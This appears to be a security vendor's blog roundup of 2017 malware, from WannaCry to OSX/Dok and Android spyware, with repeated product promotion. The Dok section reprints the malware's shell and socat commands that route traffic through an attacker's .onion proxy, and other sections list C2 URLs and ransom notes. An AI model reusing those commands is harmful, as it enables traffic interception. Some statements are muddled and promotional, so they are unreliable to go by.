WanaCry Ransomware

WanaCrypt, or also known as WanaCry, is a new ransomware that wreaked havoc across the world last night, which spreads like a worm by leveraging a Windows SMB vulnerability (MS17-010) that has been previously fixed by Microsoft in March. In these attacks, data is encrypted with the extension “.WCRY” added to the filenames. “WannaCry”, is initiated through an SMBv2 remote code execution in Microsoft Windows. This exploit (codenamed “EternalBlue”) has been made available on the internet through the Shadowbrokers dump on April 14th, 2017 and patched by Microsoft on March 14.

Unfortunately, it appears that many organizations have not yet installed the patch.

In the wake of the largest ransomware attack in the history that had already infected over 114,000 Windows systems worldwide since last 24 hours, Microsoft just took an unusual step to protect its customers with out-of-date computers. Microsoft has just released an emergency security patch update for all its unsupported version of Windows, including Windows XP, Vista, Windows 8, Server 2003 and 2008 Editions. Download vulnerability patch from here https://technet.microsoft.com/en-us/library/security/ms17-010.aspx .

People already infected with this ransomware will not get their files back. It means that no new infections will occur with yesterday’s strain. Currently, there’s no known method of breaking the ransomware’s encryption. The only viable method of getting files back at the moment is from previous operating system backups, and by paying the ransom note, as a last resort. We recommend using Max Total Security which can help you restore your file from daily back up module, Tools>Max Backup Utility. It can also detect and terminate this Ransomware from spreading further on your PC.

Max Total Security also has a newly introduced module in its tools treasure. Tools>Max Application Whitelist , this module allows you to completely protect your PC from any unauthorized, not welcome executables. In a normal day to day operation you know which programs you are going to use on your PC so just go to this tool and allow those applications whicih run from program file folder. System executables are already taken care off. From now onward , no other executable will be allowed to run on your PC, completely protecting it from any types of Trojans.

Amnesia ransomware

The Amnesia Ransomware is used to take the victims’ files hostage. Ransomware Trojans like the Amnesia Ransomware are designed to encrypt the victim’s files using a strong encryption algorithm. It encrypts victim’s files and refrains from accessing their sensitive and other personal files. It alters the names of all encrypted files with .amnesia extension. Then attacker demands a ransom in exchange for file decryption.
The files encrypted in the Amnesia Ransomware attack will no longer be readable and may show up as blank icons in the Windows Explorer. The Amnesia Ransomware targets a wide variety of files, generally looking for user generated files that may include spreadsheets, text documents, images, videos, music files, databases, etc. The Amnesia Ransomware delivers its ransom note in the form of a text file named ‘HOW TO RECOVER ENCRYPTED FILES.TXT.’ This file alerts the victim of the attack and demands the payment of a ransom to recover the infected files. The full text of the Amnesia Ransomware ransom note:

‘YOUR FILES ARE ENCRYPTED!
Your personal ID:
[RANDOM CHRACTERS]
Attention! What happened?
Your documents, databases and other important data has been encrypted.
If you want to restore files send an email to: s1an1er111@protonmail.com
In a letter to indicate your personal identifier (see in the beginning of this document).
Attention!
* Do not attempt to remove the program or run the anti-virus tools.
* Attempts to self-decrypting files will result in the loss of your data.
* Decoders are not compatible with other users of your data, because each user’s unique encryption key.’

The best protection against the Amnesia Ransomware and similar ransomware threats is to have backups of all files on an independent memory device or the cloud, as well as a reliable security program like Max Total Security that is fully up-to-date and capable of intercepting the Amnesia Ransomware and similar threat attacks before they can start infection.

Mikoyan ransomware

The infection process of .MIKOYAN ransomware is very similar to other ransomware infections out there. The malware may take advantage of massive spam campaigns that redistribute malicious attachments as well web links that lead to the download of the infection files. Such e-mails are cleverly orchestrated in a manner that aims to convince users to open the attachment.

mikoyan-ransomware
Besides via e-mail, the .MIKOYAN ransomware virus may also be replicated via multiple other methods such as:

Exploit kits.
Via a previous infection with a botnet or a Trojan.
Through fake installers, flash player updates or other setup wizards.
Via a fake key generators or license activators uploaded on torrent websites.

Once this ransomware infection has already become active on a computer, the .MIKOYAN virus drops it’s malicious payload files. They are often located in the following Windows directories:

%Common%
%AppData%
%LocalLow%
%Local%
%Roaming%
Besides the main executable of the MIKOYAN ransomware, named MIKOYAN.exe, the virus may also drop other malicious files that exist under different names, often randomly generated ones. After the encryption process has completed, the ransomware sets a .MIKOYAN file extension to the files encrypted by it.

To run on startup, the MIKOYAN ransomware may also modify the Windows Registry editor, more specifically the Run and RunOnce registry keys:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce

Like always we recommend that you keep an updated copy of Max Total Security on your PC which can restore your files from the daily built in back up. Also, 24×7 free support can help you with any issues. You can get it from here Max Total Security.

XPan Ransomware

The XPan Ransomware is being used to target small and medium businesses located in Brazil (although there is nothing limiting these attacks only to Brazil since these threat attacks can target computers anywhere). Taking advantage of remote desktop connections protected poorly is carrying out the XPan Ransomware attacks. Exploiting poor password protection and security measures, con artists can install the XPan Ransomware on the victims’ computers, as well as carry out other threatening operations.

The ransomware, suspected to be distributed by a group of small-time cybercriminals has already affected many computers belonging to small and medium businesses in the country. The similarities between XPan and .one ransomware was found during an in-depth analysis of the malicious program. The similarities include the target file extensions, ransom note, commands executed before and after the encryption process and even the public RSA keys of the criminals.

For each target file the malware generates a new unique 255-byte random string S (which contains the substring “NMoreira”), turns it into a 256-bit key using the API CryptDeriveKey, and proceeds to encrypt the file contain using AES-256 in CBC mode with zero IV. According to one of the victims, criminals were asking for 0.3 bitcoin to provide the recovery key, using the same approach as they did with before: the user sends a message to a mailbox with his unique ID and patiently awaits for further instructions.

OSX Malware – Dok

People often assume that if you’re running OSX, you’re relatively safe from malware. But this is becoming less and less true, as evidenced by a new strain of malware encountered by the Check Point malware research team. This new malware – dubbed OSX/Dok — affects all versions of OSX.

This is the first “major scale” malware directed at Mac owners through a “coordinated email phishing campaign.” The emails are aimed mostly at Europeans, one example being a German-language message from a supposed Swiss official, claiming problems with the target’s tax return.

The malware works by gaining administration privileges in order to install a new root certificate on the user’s system. This enables it to gain access to all communications between the host Mac and the internet, including traffic flowing through connections encrypted with SSL.
Dok
The malware later presents the user with a security message claiming an update is available for the system, for which a password input is required. Following the “update”, the malware gains complete control of admin privileges, adjusts the network settings to divert all outgoing connections through a proxy, and installs additional tools that enable it to perform a man-in-the-middle attack on all traffic.

The malware bundle is contained in a .zip archive named Dokument.zip. It was signed on April 21th 2017 by a “Seven Muller” and the bundle name is Truesteer.AppStore.

Upon execution, the malware will copy itself to the /Users/Shared/ folder, and will then proceed to execute itself from the new location by running the shell commands below:

chmod +x /Users/Shared/AppStore.app …gives all users execute permission
rm -fr “/Users/_%USER%_/Downloads/Dokument.app”…delete the original copy
“/Users/Shared/Appstore.app/Contents/MacOS/AppStore”Dokument…exceute the application

The malware will also install 2 LaunchAgents that will start with system boot, and have the following names:

/Users/_%User%_/Library/LaunchAgents/com.apple.Safari.proxy.plist

/Users/_%User%_/Library/LaunchAgents/com.apple.Safari.pac.plist

These LaunchAgents will redirect requests to 127.0.0.1 through the dark web address “paoyu7gub72lykuk.onion”. This is necessary for the previous PAC configuration to work (note that the original configuration looks for the PAC file on the local host 127.0.0.1).

These launchAgents consist of the following BASH commands:

/usr/local/bin/socat tcp4-LISTEN:5555,reuseaddr,fork,keepalive,bind=127.0.0.1 SOCKS4A:127.0.0.1:paoyu7gub72lykuk.onion:80,socksport=9050

/usr/local/bin/socat tcp4-LISTEN:5588,reuseaddr,fork,keepalive,bind=127.0.0.1 SOCKS4A:127.0.0.1:paoyu7gub72lykuk.onion:5588,socksport=9050

As a result of all of the above actions, when attempting to surf the web, the user’s web browser will first ask the attacker web page on TOR for proxy settings. The user traffic is then redirected through a proxy controlled by the attacker, who carries out a Man-In-the-Middle attack and impersonates the various sites the user attempts to surf. The attacker is free to read the victim’s traffic and tamper with it in any way they please.

Beware of emails attachments, do not enter your root password when asked by any app. Also, keep an updated copy of Mac Total Security by Max Secure Software.

MilkyDoor Android Malware

A newly discovered Android malware called MilkyDoor turns mobile devices into “walking backdoors” that give attackers access to whatever network an infected user is connected to. Affected phones essentially act as proxy servers that link legitimate networks with malicious command-and-control servers via Socket Secure (SOCKS) protocol, allowing bad actors to exfiltrate data.

It uses remote port forwarding via Secure Shell (SSH) tunnels to hide malicious traffic and grant attackers access to firewall-protected networks. The malware was recently found in over 200 Android applications available through the Play Store. Google has removed them from their official app store.

In total, researchers estimate the apps had between 500,000 and 1 million installs only through the Play Store alone.
While MilkyDoor appears to be DressCode’s successor, MilkyDoor adds a few malicious tricks of its own. Among them are its more clandestine routines that enable it to bypass security restrictions and conceal its malicious activities within normal network traffic. It does so by using remote port forwarding via Secure Shell (SSH) tunnel through the commonly used Port 22. The abuse of SSH helps the malware encrypt malicious traffic and payloads, which makes detection of the malware trickier.

We found these Trojanized apps masquerading as recreational applications ranging from style guides and books for children to Doodle applications. We surmise that these are legitimate apps which cybercriminals repackaged and Trojanized then republished in Google Play, banking on their popularity to draw victims.

MilkyDoor poses greater risk to businesses due to how it’s coded to attack an enterprise’s internal networks, private servers, and ultimately, corporate assets and data. The way MilkyDoor builds an SSH tunnel presents security challenges for an organization’s network, particularly in networks that integrate BYOD devices. Its stealth lies in how the infected apps themselves don’t have sensitive permissions and consequently exist within the device using regular or seemingly benign communication behavior.

The repercussions are also significant. MilkyDoor can covertly grant attackers direct access to a variety of an enterprise’s services—from web and FTP to SMTP in the internal network. The access can then be leveraged to poll internal IP addresses in order to scan for available—and vulnerable—servers. The recent spate of compromises in MongoDB and ElasticSearch databases, where their owners were also extorted, are a case in point. The servers were public, which is exacerbated by the lack of authentication mechanisms in its internal databases.

End users and enterprises can benefit from mobile total security solution, Max Total Security available on Google Play.

SMSVova Spyware -Android

SMS-based Spyware, which can steal and relay a victim’s location to an attacker in real time, was downloaded between 1 and 5 million times before being pulled from Google’s official U.S. Play Store. On the Play Store, the app was titled “System Update,” suggesting that users who download it would receive the latest Android release.

The malware, called SMSVova, is capable of pinpointing a user’s exact geolocation and then sending that data to an attacker. However, upon installing and opening SMSVova, the app immediately quits, delivering the following message: “Unfortunately, Update Service has stopped.” The app then hides itself from the main screen.

At this point, the app enables a MyLocationService feature that tracks a user’s last known location. It also scans for SMS message commands, which the attacker sends in order to adjust malware settings and ultimately request a user’s device location. The attacker can even specifically ask to receive a location alert when the victim’s battery is running low.

smsvova

Despite the error message, the spyware sets up an Android service and broadcast receiver:

MyLocationService: Fetches last known location
IncomingSMS (Receiver): Scans for incoming SMS messages

MyLocationService is to fetch the user’s last known location and set it up in Shared Preferences. Shared Preferences is one of the many ways Android stores an application’s data.
IncomingSMS is designed to look for incoming SMS messages with a particular syntax, in which the message should be more than 23 characters and should contain “vova-” in the SMS body. It also scans for a message containing “get faq.”

matrix9643@yahoo.com ransomware

Matrix virus, alternatively called as matrix9643@yahoo.com ransomware, functions as a crypto-Trojan. Matrix Ransomware has the worm like features that allow it to spread outside of the originally infected machine via Windows shortcuts. This malware appends “.matrix” or “.b10cked” extension to the name of every encrypted file. For instance, “sample.jpg” is renamed to “sample.jpg.matrix”. Following successful encryption, Matrix creates a text file “matrix-readme.rtf” (newer variants drop “Readme-Matrix.rtf” fileor “WhatHappenedWithMyFiles.rtf”) and places it in every folder containing ransom demanding message.

matrix-ransom-note

while performing the encryption, Matrix will hide a folder and then create a shortcut with the same name. It will then make a copy of the ransomware executable and save it as desktop.ini in the original:

matrix1
Clicking on any shortcut will launch the malware program.

Files associated with the Matrix Ransomware:
%UserProfile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\[random].hta
%UserProfile%\AppData\Roaming\[victim_id].pek
%UserProfile%\AppData\Roaming\[victim_id].sek
%UserProfile%\AppData\Roaming\errlog.txt
%UserProfile%\AppData\Roaming\[random].cmd
%UserProfile%\AppData\Roaming\[random].afn
%UserProfile%\AppData\Roaming\[random].ast
%UserProfile%\AppData\Roaming\[random].hta
matrix-readme.rtf
Bl0cked-ReadMe.rtf
WhatHappenedWithFiles.rtf

Network Communication:
stat3.s76.r53.com.ua/addrecord.php
stat3.s76.r53.com.ua/uploadextlist.php

With increase in everyday Ransomware activity, users are highly recommended to back up the files on daily basis to minimize loss of data and use a good anti virus program such Max Total Security which can take daily backup with highly configuration options for users.

Rijndael Ransomware-another encryptor

The Rijndael Ransomware may be contained in files named ‘BitcoinMiner.exe’ and ‘r4ns0mw4r3.exe’ and seems to be the work of a coder that goes by the online handle ‘humanpuff69.’ This coder has uploaded YouTube videos with information on how to create rogue security software and clones of CryptoWall. Like most ransomware Trojans, the Rijndael Ransomware is designed to block all access to the victim’s files by encrypting them using a strong encryption algorithm. The files affected by the Rijndael Ransomware will have the file extension ‘.fucked’ added to the extremity of each file’s name. The Rijndael Ransomware is capable of encrypting a wide variety of files.
To display its ransom note, the Rijndael Ransomware uses a program window that includes the message below:

‘Deathnote Hackers Was Here !
Your Computer files is encrypted
all files is encrypted with extremely
powerfull new RIDNDAEL encryption
that no one can break except you have
a private string and IVs
To Decrypt Your File You Should Pay Me
0.5 BTC (864.98 USD)
Contact Me : Riptours01@gmail.com
insert your code here:
[TEXT BOX] Decrypt!

Although it may be impossible to recover the data that is encrypted by Trojans like the Rijndael Ransomware, the Rijndael Ransomware’s decryption key is hard coded into its main executable file and have been able to recover it. Victims can enter the code ’83KYG9NW-3K39V-2T3HJ-93F3Q-GT’ into the text box included in the Rijndael Ransomware ransom message to restore their files. It is likely that the con artists will update the Rijndael Ransomware to remove this weakness, but for now, it is possible for computer users to recover their files from the attack.
Users can recover their encrypted file from Max Total Security Backup module.

Ramnit Trojan in new malvertising campaign

There has been an increase in malvertising activity coming from adult websites that have significant traffic (several million monthly visits each). Malicious actors are using pop-under ads (adverts that load in a new browser window under the current active page) to surreptitiously redirect users to the RIG exploit kit. It has mostly hit Canada and UK.

Ramnit spies on you and everything it finds it sends to the crooks behind it. We are talking IPs, usernames, passwords, accounts, email addresses, browser-related data, etc. Consider your private life no longer private. And last, but definitely not least, the Trojan may try stealing your money by making you purchase some fake anti-virus product or present you a fake update. Trust nothing. It is all a scam for profit. Don’t click on and definitely don’t by anything Ramnit suggests as you will only worsen your already pretty bad situation.

To manually find its infection ,do the following:
1. Run the Task Manager by right clicking on the Taskbar and choosing Start Task Manager.Run the Task Manager by right clicking on the Taskbar and choosing Start Task Manager. Look carefully at the file names and descriptions of the running processes. If you find any suspicious one, search on Google for its name. If you find a malware process, right-click on it and choose End task.

2.Open Control Panel by holding the Win Key and R together. Write appwiz.cpl in the field, then click OK. Here, find any program you had no intention to install and uninstall it.

3.Open MS Config by holding the Win Key and R together. Type msconfig and hit Enter. Go in the Startup tab and Uncheck entries that have “Unknown” as Manufacturer.

4. Scan with Max Total Security . If you still think your PC may be infected, contact Max Secure Software free 24×7 technical support.